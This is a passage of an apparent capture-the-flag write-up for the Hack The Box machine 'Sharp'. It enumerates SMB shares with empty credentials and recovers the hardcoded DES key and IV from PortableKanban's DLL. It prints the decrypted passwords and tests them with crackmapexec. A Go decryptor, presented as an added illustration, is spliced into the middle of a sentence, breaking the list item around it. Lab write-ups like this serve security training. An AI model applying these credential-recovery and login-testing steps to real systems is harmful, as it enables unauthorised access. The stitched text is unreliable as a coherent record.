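SMB  10.10.10.219  445  SHARP  C$                    Default share
SMB  10.10.10.219  445  SHARP  dev
SMB  10.10.10.219  445  SHARP  IPC$                  Remote IPC
SMB  10.10.10.219  445  SHARP  kanban   READ'

# Only touch the network when asked: sh nullshares.sh enum
if [ "${1:-}" = "enum" ]; then
    enumerate
fi
```

<div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Run it as <code class="SemanticString__Fragment SemanticString__Fragment--Code">TARGET=10.10.10.219 sh nullshares.sh enum</code>; without the argument it only defines the functions, so the parsers can be checked offline against the embedded samples. Mounting read-only keeps an accidental write from changing the share; edits go to a local copy.</span></span></p></div><span class="SemanticStringArray"><span class="SemanticString">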
Try again with a credentials file that holds empty values:</span></span><div id="https://www.notion.so/2df10efdcaf742b39031d5001c5e5fa4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo -e "username=\npassword=" > creds.smb</code></span></span></p></div><div id="https://www.notion.so/5b80658b7ed54b17a1652bd84c65e224" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo mount -t cifs -o credentials=./creds.smb //10.10.10.219/kanban ./mnt</code></span></span></p></div></li><li id="https://www.notion.so/f33f507a44e64fa2acd040088eb03f9b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">No error this time; confirm the mount and its negotiated options in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/proc/mounts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/e2b0db235f4a435eab901cc1ab822bf9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /proc/mounts | grep kanban</code></span></span></p></div><pre id="https://www.notion.so/e356c6b0099a4d528fa70135116416a8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>//10.10.10.219/kanban /home/samiko/Desktop/oscp-prep/HTB/Sharp/mnt cifs 
rw,relatime,vers=3.1.1,sec=none,cache=strict,uid=0,noforceuid,gid=0,noforcegid,addr=10.10.10.219,file_mode=0755,dir_mode=0755,soft,nounix,serverino,mapposix,rsize=4194304,wsize=4194304,bsize=1048576,echo_interval=60,actimeo=1 0 0</span></span></span></code></pre></li><li id="https://www.notion.so/2716de12745c4de4a413f077803baaff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The SMB share was mounted successfully. We can also make a local copy of the share for easier access and editing:</span></span><div id="https://www.notion.so/526d131bf35a46db8771556552cb6462" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir smb && cd smb && smbget -a -R smb://10.10.10.219/kanban</code></span></span></p></div><div id="https://www.notion.so/9b1289df514f4294a493ed0ddb7595fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la ./mnt</code></span></span></p></div><pre id="https://www.notion.so/b05a17a2c12140ee92c29fcf7617b309" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>-rwxr-xr-x 1 root root 58368 Feb 27 2013 CommandLine.dll
-rwxr-xr-x 1 root root 141312 Nov 9 2017 CsvHelper.dll
-rwxr-xr-x 1 root root 456704 Jun 23 2016 DotNetZip.dll
drwxr-xr-x 2 root root 0 Nov 15 05:27 Files
-rwxr-xr-x 1 root root 23040 Nov 24 2017 Itenso.Rtf.Converter.Html.dll
-rwxr-xr-x 1 root root 75776 Nov 24 2017 Itenso.Rtf.Interpreter.dll
-rwxr-xr-x 1 root root 32768 Nov 24 2017 Itenso.Rtf.Parser.dll
-rwxr-xr-x 1 root root 19968 Nov 24 2017 Itenso.Sys.dll
-rwxr-xr-x 1 root root 376832 Nov 24 2017 MsgReader.dll
-rwxr-xr-x 1 root root 133296 Jul 4 2014 Ookii.Dialogs.dll
-rwxr-xr-x 1 root root 2558011 Nov 13 06:34 pkb.zip
drwxr-xr-x 2 root root 0 Nov 13 06:35 Plugins
-rwxr-xr-x 1 root root 5819 Nov 15 05:26 PortableKanban.cfg
-rwxr-xr-x 1 root root 118184 Jan 5 2018 PortableKanban.Data.dll
-rwxr-xr-x 1 root root 1878440 Jan 5 2018 PortableKanban.exe
-rwxr-xr-x 1 root root 31144 Jan 5 2018 PortableKanban.Extensions.dll
-rwxr-xr-x 1 root root 2080 Nov 15 05:26 PortableKanban.pk3
-rwxr-xr-x 1 root root 2080 Nov 15 05:25 PortableKanban.pk3.bak
-rwxr-xr-x 1 root root 34 Nov 15 05:26 PortableKanban.pk3.md5
-rwxr-xr-x 1 root root 413184 Sep 6 2017 ServiceStack.Common.dll
-rwxr-xr-x 1 root root 137216 Sep 6 2017 ServiceStack.Interfaces.dll
-rwxr-xr-x 1 root root 292352 Sep 6 2017 ServiceStack.Redis.dll
-rwxr-xr-x 1 root root 411648 Sep 6 2017 ServiceStack.Text.dll
-rwxr-xr-x 1 root root 1050092 Jan 5 2018 'User Guide.pdf'</span></span></span></code></pre></li><li id="https://www.notion.so/6780e45766324003868ed6bb150c9029" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The share contains the setup files for PortableKanban; the files of particular interest are:
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3.bak</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.cfg</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">User Guide.pdf</code></span></span></li><li id="https://www.notion.so/8263c889345e47279099d0db3aad869a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3.bak</code></span><span class="SemanticString"> are identical files:</span></span><div id="https://www.notion.so/e706d7be9eab4a5aa0a82a16869b83c8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ diff PortableKanban.pk3 PortableKanban.pk3.bak</code></span></span></p></div></li><li id="https://www.notion.so/e28315876c6540f68cf49e6a549a7b3c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found encrypted credentials in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.pk3</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/89d91bec3f724c79be7f0508bc4c4478" class="Code Code--NoWrap"><code><span 
class="SemanticStringArray"><span class="SemanticString"><span><span class="token property">"Users"</span><span class="token operator">:</span>
<span class="token punctuation">[</span>
<span class="token punctuation">{</span>
<span class="token property">"Id"</span><span class="token operator">:</span><span class="token string">"e8e29158d70d44b1a1ba4949d52790a0"</span><span class="token punctuation">,</span>
<span class="token property">"Name"</span><span class="token operator">:</span><span class="token string">"Administrator"</span><span class="token punctuation">,</span>
<span class="token property">"Initials"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"Email"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"EncryptedPassword"</span><span class="token operator">:</span><span class="token string">"k+iUoOvQYG98PuhhRC7/rg=="</span><span class="token punctuation">,</span>
<span class="token property">"Role"</span><span class="token operator">:</span><span class="token string">"Admin"</span><span class="token punctuation">,</span>
<span class="token property">"Inactive"</span><span class="token operator">:</span><span class="token boolean">false</span><span class="token punctuation">,</span>
<span class="token property">"TimeStamp"</span><span class="token operator">:</span><span class="token number">637409769245503731</span>
<span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span>
<span class="token property">"Id"</span><span class="token operator">:</span><span class="token string">"0628ae1de5234b81ae65c246dd2b4a21"</span><span class="token punctuation">,</span>
<span class="token property">"Name"</span><span class="token operator">:</span><span class="token string">"lars"</span><span class="token punctuation">,</span>
<span class="token property">"Initials"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"Email"</span><span class="token operator">:</span><span class="token string">""</span><span class="token punctuation">,</span>
<span class="token property">"EncryptedPassword"</span><span class="token operator">:</span><span class="token string">"Ua3LyPFM175GN8D3+tqwLA=="</span><span class="token punctuation">,</span>
<span class="token property">"Role"</span><span class="token operator">:</span><span class="token string">"User"</span><span class="token punctuation">,</span>
<span class="token property">"Inactive"</span><span class="token operator">:</span><span class="token boolean">false</span><span class="token punctuation">,</span>
<span class="token property">"TimeStamp"</span><span class="token operator">:</span><span class="token number">637409769265925613</span>
<span class="token punctuation">}</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/d60bed825c3f4c69a044b6167b0315c2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The user's name is Lars.</span></span></li><li id="https://www.notion.so/6fa0d970d6424cf58733fc29aa63775e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found encrypted credentials:</span></span><div id="https://www.notion.so/eebe8f9db39749dab0de453047989e8b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Administrator:k+iUoOvQYG98PuhhRC7/rg==</code></span></span></p></div><div id="https://www.notion.so/9f4e42356602442282fa8c8d0f25df4e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">lars:Ua3LyPFM175GN8D3+tqwLA==</code></span></span></p></div></li><li id="https://www.notion.so/c81ada130ad0437ca4ccbbb0fdc2df64" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The encrypted passwords look like base64 (note the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">==</code></span><span class="SemanticString"> padding at the end), but decoding them did not yield readable plaintext.</span></span></li><li id="https://www.notion.so/c42f4cc411104c55855455ad1884f572" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found a possible machine name in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PortableKanban.cfg</code></span><span class="SemanticString">:</span></span><div 
id="https://www.notion.so/5150127a4b714ed2af18fc8f4d1e60cd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">DESKTOP-86DR53S</code></span></span></p></div></li></ul><div id="https://www.notion.so/087d23abc6814f6c926c03be1d40ece9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Reversing PortableKanban.Data.dll with dotPeek:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/a0cf5540905d43ccacf8fc50b5841771" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found key and initialisation vector used for encrypting password in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Crypto.cs</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/416a71cb2c7143a9a7947a52bf1acc7d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token class-name"><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> _rgbKey <span class="token operator">=</span> Encoding<span class="token punctuation">.</span>ASCII<span class="token punctuation">.</span><span class="token function">GetBytes</span><span class="token punctuation">(</span><span class="token string">"7ly6UznJ"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token class-name"><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span></span> _rgbIV <span class="token operator">=</span> Encoding<span class="token punctuation">.</span>ASCII<span class="token punctuation">.</span><span class="token function">GetBytes</span><span class="token punctuation">(</span><span class="token string">"XuVUm5fR"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/de058d30df9647ecb3fc15ecacc1d942" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Encrypt</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Decrypt</code></span><span class="SemanticString"> functions in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Crypto.cs</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/c8b08dac0fd640fdad6cce97cf373bf5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">Encrypt</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> originalString<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">string</span><span class="token punctuation">.</span><span class="token function">IsNullOrEmpty</span><span class="token punctuation">(</span>originalString<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token keyword">try</span>
<span class="token punctuation">{</span>
<span class="token class-name">DESCryptoServiceProvider</span> cryptoServiceProvider <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">DESCryptoServiceProvider</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">MemoryStream</span> memoryStream <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">MemoryStream</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">CryptoStream</span> cryptoStream <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">CryptoStream</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> memoryStream<span class="token punctuation">,</span> cryptoServiceProvider<span class="token punctuation">.</span><span class="token function">CreateEncryptor</span><span class="token punctuation">(</span>Crypto<span class="token punctuation">.</span>_rgbKey<span class="token punctuation">,</span> Crypto<span class="token punctuation">.</span>_rgbIV<span class="token punctuation">)</span><span class="token punctuation">,</span> CryptoStreamMode<span class="token punctuation">.</span>Write<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">StreamWriter</span> streamWriter <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StreamWriter</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> cryptoStream<span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Write</span><span class="token punctuation">(</span>originalString<span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Flush</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
cryptoStream<span class="token punctuation">.</span><span class="token function">FlushFinalBlock</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
streamWriter<span class="token punctuation">.</span><span class="token function">Flush</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">return</span> Convert<span class="token punctuation">.</span><span class="token function">ToBase64String</span><span class="token punctuation">(</span>memoryStream<span class="token punctuation">.</span><span class="token function">GetBuffer</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span> memoryStream<span class="token punctuation">.</span>Length<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> ex<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre><pre id="https://www.notion.so/0399b2b3a44f46019f997b191ab166de" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">Decrypt</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> cryptedString<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">try</span>
<span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">string</span><span class="token punctuation">.</span><span class="token function">IsNullOrEmpty</span><span class="token punctuation">(</span>cryptedString<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token class-name">DESCryptoServiceProvider</span> cryptoServiceProvider <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">DESCryptoServiceProvider</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">return</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StreamReader</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">CryptoStream</span><span class="token punctuation">(</span><span class="token punctuation">(</span>Stream<span class="token punctuation">)</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">MemoryStream</span><span class="token punctuation">(</span>Convert<span class="token punctuation">.</span><span class="token function">FromBase64String</span><span class="token punctuation">(</span>cryptedString<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span> cryptoServiceProvider<span class="token punctuation">.</span><span class="token function">CreateDecryptor</span><span class="token punctuation">(</span>Crypto<span class="token punctuation">.</span>_rgbKey<span class="token punctuation">,</span> Crypto<span class="token punctuation">.</span>_rgbIV<span class="token punctuation">)</span><span class="token punctuation">,</span> CryptoStreamMode<span class="token punctuation">.</span>Read<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">ReadToEnd</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">Exception</span> ex<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token keyword">return</span> <span class="token keyword">string</span><span class="token punctuation">.</span>Empty<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/50b31fab0c6d4d9b96239f561fbe2c64" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The password is encrypted with DES, then encoded in base64.</span></span></li><li id="https://www.notion.so/c332c547aa5842b4a5bee6dc6c6a3b6f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since we know the key and IV, we can decrypt the passwords after decoding from base64 using CyberChef:</span></span><div id="https://www.notion.so/4219c753d39e4fe0bc7df4ad56fdd8b8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">administrator:G2@$btRSHJYTarg</code></span></span></p></div><div id="https://www.notion.so/5add20e7d66747409f68a4ade374f14d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">lars:G123HHrth234gRG</code></span></span></p></div></li><li id="https://www.notion.so/6cc60cb4a2ab4d53bce6485811385788" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Test credentials:</span></span><div id="https://www.notion.so/42d8729486b0449a87358d28b107d894" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.10.219 -u administrator -p G2@\$btRSHJYTarg</code></span></span></p></div><pre id="https://www.notion.so/6159a863a64a4c27bd34b77bf88edb23" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>WINRM 10.10.10.219 5985 SHARP [*] 
Windows 10.0 Build 17763 (name:SHARP) (domain:Sharp)
WINRM 10.10.10.219 5985 SHARP [*] http://10.10.10.219:5985/wsman
WINRM 10.10.10.219 5985 SHARP [-] Sharp\administrator:G2@$btRSHJYTarg</span></span></span></code></pre><div id="https://www.notion.so/07ebfc33e1444a5786e72ee9f9761a37" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.10.219 -u lars -p G123HHrth234gRG</code></span></span></p></div><pre id="https://www.notion.so/3c7aa8cd63f14931b721b6060bd01d7c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>WINRM 10.10.10.219 5985 SHARP [*] Windows 10.0 Build 17763 (name:SHARP) (domain:Sharp)
WINRM 10.10.10.219 5985 SHARP [*] http://10.10.10.219:5985/wsman
WINRM 10.10.10.219 5985 SHARP [-] Sharp\lars:G123HHrth234gRG</span></span></span></code></pre><div id="https://www.notion.so/8a008669ef214e80b0fd1e647d3ff57c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u administrator -p G2@\$btRSHJYTarg --shares</code></span></span></p></div><pre id="https://www.notion.so/8cd3a0c260944d26bfbf1b01edde6d98" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [-] Sharp\administrator:G2@$btRSHJYTarg STATUS_LOGON_FAILURE
SMB 10.10.10.219 445 SHARP [-] Error enumerating shares: STATUS_USER_SESSION_DELETED</span></span></span></code></pre><div id="https://www.notion.so/98d333139112419586ccf7785368c225" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.10.219 -u lars -p G123HHrth234gRG --shares</code></span></span></p></div><pre id="https://www.notion.so/3012255b65634062938ac0036a6e300b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.10.219 445 SHARP [*] Windows 10.0 Build 17763 x64 (name:SHARP) (domain:Sharp) (signing:False) (SMBv1:False)
SMB 10.10.10.219 445 SHARP [+] Sharp\lars:G123HHrth234gRG
SMB 10.10.10.219 445 SHARP [+] Enumerated shares
SMB 10.10.10.219 445 SHARP Share Permissions Remark
SMB 10.10.10.219 445 SHARP ----- ----------- ------
SMB 10.10.10.219 445 SHARP ADMIN$ Remote Admin
SMB 10.10.10.219 445 SHARP C$ Default share
SMB 10.10.10.219 445 SHARP dev READ
SMB 10.10.10.219 445 SHARP IPC$ READ Remote IPC
SMB 10.10.10.219 445 SHARP kanban</span></span></span></code></pre></li><li id="https://www.notion.so/ff09764067a9473b872180de626e5fda" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">New SMB share access using Lars' credentials:
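The password scheme recovered from Crypto.cs above (DES-CBC with the hardcoded key 7ly6UznJ and IV XuVUm5fR, PKCS7 padding, base64 output; CBC and PKCS7 are the .NET DESCryptoServiceProvider defaults), reimplemented in Go as an added example that is not part of the original writeup or of PortableKanban. It shows why a key and IV baked into a shipped DLL give stored passwords no real protection: anyone holding the DLL and the .pk3 file can recover the plaintexts, which is why credentials should be stored as salted password hashes rather than reversibly encrypted.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
)

// Key and IV exactly as recovered from Crypto.cs in PortableKanban.Data.dll.
var (
	rgbKey = []byte("7ly6UznJ")
	rgbIV  = []byte("XuVUm5fR")
)

// pkcs7Pad appends PKCS7 padding so the length is a multiple of size.
func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips and validates PKCS7 padding.
func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("invalid padded length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("invalid padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid padding")
		}
	}
	return b[:len(b)-n], nil
}

// Encrypt mirrors Crypto.Encrypt: empty input yields "", otherwise
// DES-CBC over the UTF-8 bytes with the fixed key/IV, then base64.
func Encrypt(plain string) (string, error) {
	if plain == "" {
		return "", nil
	}
	block, err := des.NewCipher(rgbKey)
	if err != nil {
		return "", err
	}
	padded := pkcs7Pad([]byte(plain), des.BlockSize)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, rgbIV).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// Decrypt mirrors Crypto.Decrypt, except that malformed input is reported
// as an error instead of being swallowed into an empty string.
func Decrypt(b64 string) (string, error) {
	if b64 == "" {
		return "", nil
	}
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct)%des.BlockSize != 0 {
		return "", errors.New("ciphertext is not a multiple of the DES block size")
	}
	block, err := des.NewCipher(rgbKey)
	if err != nil {
		return "", err
	}
	out := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, rgbIV).CryptBlocks(out, ct)
	plain, err := pkcs7Unpad(out, des.BlockSize)
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

func main() {
	// The two EncryptedPassword values taken from PortableKanban.pk3 above.
	for _, u := range []struct{ name, enc string }{
		{"Administrator", "k+iUoOvQYG98PuhhRC7/rg=="},
		{"lars", "Ua3LyPFM175GN8D3+tqwLA=="},
	} {
		p, err := Decrypt(u.enc)
		fmt.Printf("%s: %q (err=%v)\n", u.name, p, err)
	}
}
```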
</span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString">, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IPC$</code></span></span></li></ul><h2 id="https://www.notion.so/fd53e962089a4c0f86e560e7e98da435" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/fd53e962089a4c0f86e560e7e98da435"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/f923bf726d5d4312b463042a0d0eb3e6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploring developer SMB share:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/8c6bec12e4814a2a9849fce9f5292163" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Mount into </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString"> share:</span></span><div id="https://www.notion.so/fdfe9c043c9244cabde0ee939f346f5b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment 
